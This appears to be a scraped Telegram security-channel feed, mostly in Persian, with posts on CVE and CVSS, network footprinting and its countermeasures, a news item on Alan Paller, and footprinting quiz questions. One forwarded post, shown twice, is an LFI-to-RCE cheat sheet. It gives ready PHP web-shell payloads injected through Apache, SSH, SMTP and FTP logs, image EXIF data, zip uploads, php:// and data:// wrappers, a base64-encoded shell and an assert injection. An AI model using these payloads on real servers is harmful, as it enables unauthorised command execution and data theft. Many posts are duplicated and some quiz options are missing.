Try Hack Box
Common Vulnerabilities and Exposures (CVE) چیست؟ T.me/TryHackBox
Common Vulnerabilities and Exposures (CVE) چیست؟
آسیبپذیریها و مواجهههای رایج (CVE) فهرستی از نقصهای امنیتی رایانه است که بر اساس اقدامات حیاتی برای کمک به افراد و شرکتها در ارزیابی خطر ناشی از آسیبپذیری یا قرار گرفتن در معرض خودتان رتبهبندی میشوند. وقتی شخصی به یک CVE مراجعه میکند، میتوانید به راحتی آسیبپذیری را با جستجو پیدا کنید، و بهدلیل بررسی ساختاریافته و مستمر و مستندسازی آسیبپذیری یا قرار گرفتن در معرض به شیوهای ثابت، میتوانید به راحتی از اهمیت خطر برای سازمان خود مطمئن شوید. هشدارهای امنیتی صادر شده توسط فروشندگان یا محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می کنند.
ورودیهای CVE مختصر هستند، شامل دادههای فنی، یا اطلاعاتی درباره تأثیرات احتمالی یا خود اصلاحها نمیشوند. این جزئیات در سایر پایگاههای داده، از جمله پایگاه داده آسیبپذیری ملی ایالات متحده (NVD)، پایگاه یادداشتهای آسیبپذیری CERT/CC، و فهرستهای اضافی که توسط فروشنده مورد نظر یا سایر سازمانهای امنیت سایبری کنترل میشوند، ظاهر میشوند. در سراسر این سیستمهای مختلف، شناسههای CVE راهی قابل اعتماد برای درک نقصهای امنیتی منحصربهفرد به روشی قابل تکرار به کاربران میدهند.
یک استاندارد مرتبط برای رتبهبندی بحرانی بودن یک CVE در سیستم امتیازدهی آسیبپذیری مشترک (CVSS) یافت میشود، مجموعهای از استانداردهای باز برای تخصیص یک عدد به یک آسیبپذیری برای ارزیابی شدت آن. امتیازات CVSS در مشاورههای CVE، NVD و CERT فهرست شدهاند. امتیازها از 0.0 تا 10.0 متغیر است که اعداد بالاتر نشان دهنده درجه بالاتری از شدت آسیب پذیری هستند. بسیاری از فروشندگان امنیتی سیستم های امتیازدهی خود را نیز ایجاد کرده اند.
CVE توسط شرکت MITRE مدیریت میشود که توسط آژانس امنیت سایبری و امنیت زیرساخت (CISA)، بخشی از وزارت امنیت داخلی ایالات متحده تأمین مالی میشود.
#cve
@TryHackBox
آسیبپذیریها و مواجهههای رایج (CVE) فهرستی از نقصهای امنیتی رایانه است که بر اساس اقدامات حیاتی برای کمک به افراد و شرکتها در ارزیابی خطر ناشی از آسیبپذیری یا قرار گرفتن در معرض خودتان رتبهبندی میشوند. وقتی شخصی به یک CVE مراجعه میکند، میتوانید به راحتی آسیبپذیری را با جستجو پیدا کنید، و بهدلیل بررسی ساختاریافته و مستمر و مستندسازی آسیبپذیری یا قرار گرفتن در معرض به شیوهای ثابت، میتوانید به راحتی از اهمیت خطر برای سازمان خود مطمئن شوید. هشدارهای امنیتی صادر شده توسط فروشندگان یا محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می کنند.
ورودیهای CVE مختصر هستند، شامل دادههای فنی، یا اطلاعاتی درباره تأثیرات احتمالی یا خود اصلاحها نمیشوند. این جزئیات در سایر پایگاههای داده، از جمله پایگاه داده آسیبپذیری ملی ایالات متحده (NVD)، پایگاه یادداشتهای آسیبپذیری CERT/CC، و فهرستهای اضافی که توسط فروشنده مورد نظر یا سایر سازمانهای امنیت سایبری کنترل میشوند، ظاهر میشوند. در سراسر این سیستمهای مختلف، شناسههای CVE راهی قابل اعتماد برای درک نقصهای امنیتی منحصربهفرد به روشی قابل تکرار به کاربران میدهند.
یک استاندارد مرتبط برای رتبهبندی بحرانی بودن یک CVE در سیستم امتیازدهی آسیبپذیری مشترک (CVSS) یافت میشود، مجموعهای از استانداردهای باز برای تخصیص یک عدد به یک آسیبپذیری برای ارزیابی شدت آن. امتیازات CVSS در مشاورههای CVE، NVD و CERT فهرست شدهاند. امتیازها از 0.0 تا 10.0 متغیر است که اعداد بالاتر نشان دهنده درجه بالاتری از شدت آسیب پذیری هستند. بسیاری از فروشندگان امنیتی سیستم های امتیازدهی خود را نیز ایجاد کرده اند.
CVE توسط شرکت MITRE مدیریت میشود که توسط آژانس امنیت سایبری و امنیت زیرساخت (CISA)، بخشی از وزارت امنیت داخلی ایالات متحده تأمین مالی میشود.
#cve
@TryHackBox
Network Footprinting
کشف و تعریف محدوده شبکه می تواند یکی دیگر از گام های مهم دیگری باشد که باید در نظر گرفته شود. دانستن اینکه آدرسهای IP هدف از کجا شروع میشوند و کجا متوقف میشوند، زمان مورد نیاز برای تعیین جزئیات را به شدت محدود میکند.
بعدا- البته به شرطی که هدف شما در محدوده IP خودش عمل کند. اگر هدف شما اجرای سرویسها در یک ابر اتفاق افتاد (و خیالتان راحت باشد، ما دیگری داریم کل فصل اختصاص داده شده به ابر آینده)، این ممکن است تا حدودی ناامید کننده باشد، اما حداقل می دانید که با چه چیزی روبرو هستید. یکی از سادهترین راهها برای دیدن اینکه سازمان در چه محدودهای مالکیت دارد یا در آن فعالیت میکند حداقل در سطح بالا، استفاده از اطلاعات رجیستری آزادانه در دسترس است.
#Footprinting
#network
@TryHackBox
کشف و تعریف محدوده شبکه می تواند یکی دیگر از گام های مهم دیگری باشد که باید در نظر گرفته شود. دانستن اینکه آدرسهای IP هدف از کجا شروع میشوند و کجا متوقف میشوند، زمان مورد نیاز برای تعیین جزئیات را به شدت محدود میکند.
بعدا- البته به شرطی که هدف شما در محدوده IP خودش عمل کند. اگر هدف شما اجرای سرویسها در یک ابر اتفاق افتاد (و خیالتان راحت باشد، ما دیگری داریم کل فصل اختصاص داده شده به ابر آینده)، این ممکن است تا حدودی ناامید کننده باشد، اما حداقل می دانید که با چه چیزی روبرو هستید. یکی از سادهترین راهها برای دیدن اینکه سازمان در چه محدودهای مالکیت دارد یا در آن فعالیت میکند حداقل در سطح بالا، استفاده از اطلاعات رجیستری آزادانه در دسترس است.
#Footprinting
#network
@TryHackBox
Footprinting Countermeasures
اقداماتی برای جلوگیری از Footprinting :
در زیر برخی از متداول ترین اقدامات متقابل برای محافظت از شما آورده شده است .
سازمان ها و کارکنان از malicious footprinting :
• آموزش کاربران را برای ایمن ماندن آنلاین ارائه دهید. در گذشته، بسیاری از شرکت ها کارمندان را از دسترسی به شبکه و سایتهای شبکههای اجتماعی محدود میکند . با این حال، امروزه از سایت های شبکه های اجتماعی به عنوان بازاریابی استفاده می شود
ابزار و برای تجارت ضروری شده اند. به همین دلیل آموزش کاربران در
برخی موارد بهتر از مسدود کردن کامل سایت های شبکه های اجتماعی است.
• سرورهای وب را برای جلوگیری از نشت اطلاعات پیکربندی کنید.
• آموزش کارمندان برای استفاده از نام مستعار در وبلاگ ها، گروه ها و انجمن ها.
• از افشای اطلاعات مهم در بیانیه های مطبوعاتی، گزارش های سالانه، محصول خودداری کنید کاتالوگ و غیره
• به عنوان یک هکر اخلاقی، از تکنیک های ردپا برای کشف و حذف هر کدام استفاده کنید اطلاعات حساس در مورد شرکت و سیستم های شما که در دسترس عمومی است .
• به موتورهای جستجو اجازه ندهید که وب سایت های شما را در حافظه پنهان ذخیره کنند و از آنها به صورت ناشناس استفاده کنید خدمات ثبت نام.
• سیاست های امنیتی را برای تنظیم اطلاعاتی که کاربران شما می توانند فاش کنند، اعمال کنید به اشخاص ثالث
• DNS داخلی و خارجی جداگانه را پیکربندی کنید یا از تقسیم DNS و محدود کردن استفاده کنید
انتقال منطقه به سرورهای مجاز
• لیست دایرکتوری ها را در سرورهای وب غیرفعال کنید.
• به کاربران در مورد خطرات مهندسی اجتماعی آموزش دهید.
• برای استفاده از خدمات حفظ حریم خصوصی در پایگاه داده Whois Lookup مشترک شوید.
• از ایجاد ارتباط متقابل در سطح دامنه برای دارایی های حیاتی جلوگیری کنید.
#Footprinting
@TryHackBox
اقداماتی برای جلوگیری از Footprinting :
در زیر برخی از متداول ترین اقدامات متقابل برای محافظت از شما آورده شده است .
سازمان ها و کارکنان از malicious footprinting :
• آموزش کاربران را برای ایمن ماندن آنلاین ارائه دهید. در گذشته، بسیاری از شرکت ها کارمندان را از دسترسی به شبکه و سایتهای شبکههای اجتماعی محدود میکند . با این حال، امروزه از سایت های شبکه های اجتماعی به عنوان بازاریابی استفاده می شود
ابزار و برای تجارت ضروری شده اند. به همین دلیل آموزش کاربران در
برخی موارد بهتر از مسدود کردن کامل سایت های شبکه های اجتماعی است.
• سرورهای وب را برای جلوگیری از نشت اطلاعات پیکربندی کنید.
• آموزش کارمندان برای استفاده از نام مستعار در وبلاگ ها، گروه ها و انجمن ها.
• از افشای اطلاعات مهم در بیانیه های مطبوعاتی، گزارش های سالانه، محصول خودداری کنید کاتالوگ و غیره
• به عنوان یک هکر اخلاقی، از تکنیک های ردپا برای کشف و حذف هر کدام استفاده کنید اطلاعات حساس در مورد شرکت و سیستم های شما که در دسترس عمومی است .
• به موتورهای جستجو اجازه ندهید که وب سایت های شما را در حافظه پنهان ذخیره کنند و از آنها به صورت ناشناس استفاده کنید خدمات ثبت نام.
• سیاست های امنیتی را برای تنظیم اطلاعاتی که کاربران شما می توانند فاش کنند، اعمال کنید به اشخاص ثالث
• DNS داخلی و خارجی جداگانه را پیکربندی کنید یا از تقسیم DNS و محدود کردن استفاده کنید
انتقال منطقه به سرورهای مجاز
• لیست دایرکتوری ها را در سرورهای وب غیرفعال کنید.
• به کاربران در مورد خطرات مهندسی اجتماعی آموزش دهید.
• برای استفاده از خدمات حفظ حریم خصوصی در پایگاه داده Whois Lookup مشترک شوید.
• از ایجاد ارتباط متقابل در سطح دامنه برای دارایی های حیاتی جلوگیری کنید.
#Footprinting
@TryHackBox
Forwarded from F.P.W Library Sec [ CyberSecurity Book ] (#M)
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning
ssh '<?php system($_GET['c'])?>'@target
.com
/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload
i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
If no success then try writing files.
———————————————————
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://
/show.php?page=expect://ls
———————————————————
12. input://
POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————
@TryHackBox
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning
ssh '<?php system($_GET['c'])?>'@target
.com
/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload
i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
If no success then try writing files.
———————————————————
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://
/show.php?page=expect://ls
———————————————————
12. input://
POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————
@TryHackBox
Forwarded from Try Hack Box
Forwarded from Network Penetration Testing
Thick Client Penetration Testing Methodology
https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology
#RedTeam
#pentest
@Network_PenetrationTesting
https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology
#RedTeam
#pentest
@Network_PenetrationTesting
آلن پالر، موسس صنعت امنیت سایبری titan و موسسه SANS، درگذشت
آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفهای آموزش امنیت سایبری را که هر ساله بیش از 40000 فنآور امنیت سایبری را آموزش میدهد، در سال 1989 تأسیس کرد.
ادامه شو میتونید از طریق لینک زیر مطالعه کنید :
https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html
Or
https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/
@TryHackBox
آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفهای آموزش امنیت سایبری را که هر ساله بیش از 40000 فنآور امنیت سایبری را آموزش میدهد، در سال 1989 تأسیس کرد.
ادامه شو میتونید از طریق لینک زیر مطالعه کنید :
https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html
Or
https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/
@TryHackBox
🕊1
کدام یک از موارد زیر بهترین انتخاب برای Footprinting است
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
Anonymous Quiz
40%
15%
42%
Netcraft
4%
Yesware
کدام یک از موارد زیر شامل مجموعه ای از پایگاه های داده در دسترس عموم است
که حاوی اطلاعات تماس ثبت نام دامنه هستند؟
که حاوی اطلاعات تماس ثبت نام دامنه هستند؟
Anonymous Quiz
15%
IETF
13%
IANA
72%
Whois
0%
OSRF
Try Hack Box
Photo
یک رکورد SOA جمع آوری شده از یک انتقال منطقه در اینجا نشان داده شده است (عکس بالا).
نام سرور DNS معتبر برای دامنه چیست و
سرورهای ثانویه هر چند وقت یک بار برای به روز رسانی بررسی می کنند؟
نام سرور DNS معتبر برای دامنه چیست و
سرورهای ثانویه هر چند وقت یک بار برای به روز رسانی بررسی می کنند؟
Anonymous Quiz
79%
DNSRV1.anycomp.com, هر 3600 ثانیه
7%
DNSRV1.anycomp.com, هر 600 ثانیه
3%
DNSRV1.anycomp.com, هر 4 ثانیه
10%
postmaster.anycomp.com, هر 600 ثانیه
یک همکار امنیتی در مورد یک حادثه اخیر گیج شده است. یک مهاجم با موفقیت به یک دستگاه در سازمان دسترسی پیدا کرد و با آن خارج شد
برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟
#Questions
برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟
#Questions
از کدام ابزار یا تکنیک Footprinting می توان برای یافتن نام و آدرس کارمندان یا نقاط فنی تماس استفاده کرد ؟
Anonymous Quiz
68%
whois
7%
nslookup
12%
dig
12%
traceroute
کدام هک گوگل تمام صفحاتی را که کلمات SQL و Version را در عنوان خود دارند نمایش می دهد؟
Anonymous Quiz
29%
inurl:SQL inurl:version
15%
allinurl:SQL version
17%
innoscript:SQL inurl:version
39%
allinnoscript:SQL version
کدام برنامه OSRF بررسی می کند تا ببیند نام کاربری وجود داشته است یا خیر
در حداکثر 22 ارائه دهنده مختلف ایمیل ثبت نام کرده اید؟
در حداکثر 22 ارائه دهنده مختلف ایمیل ثبت نام کرده اید؟
Anonymous Quiz
57%
20%
0%
23%